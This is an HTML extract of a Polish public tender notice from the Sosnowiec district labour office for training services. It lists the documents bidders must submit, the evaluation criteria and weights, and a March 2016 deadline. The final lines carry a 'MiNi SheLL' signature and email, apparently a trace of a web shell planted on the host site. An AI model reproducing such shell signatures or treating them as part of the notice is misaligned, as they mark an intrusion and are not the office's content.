<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	Oświadczenie o pozostawaniu w rejestrze instytucji, szkoleniowych ( z podaniem numeru ewidencyjnego ) prowadzonym przez Właściwy Wojewódzki Urząd Pracy,
-Formularz ofertowy,
-Formularz cenowy,
-Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1,
-Program szkolenia,
-Posiadane przez instytucję szkoleniową certyfikaty jakości usług.   
-Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań   w imieniu firmy składającej oferty, o ile nie wynikają z przepisów prawa lub innych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość świadczonych usług (certyfikaty jakości usług posiadane przez Wykonawcę ) - 10</li>
<li>3 - Doświadczenie jednostki w realizacji szkoleń grupowych z obszaru zlecanego szkolenia - 20</li>
<li>4 - Dostosowanie kwalifikacji i doświadczenia kadry dydaktycznej do zakresu szkolenia - 5</li>
<li>5 - Sposób sprawdzania efektów szkolenia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.sosnowiec.pl / www.bip.pup.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy 
ul. Rzeźnicza 12 
41-200 Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2016 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Sosnowcu ul. Rzeźnicza 12 pokój 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com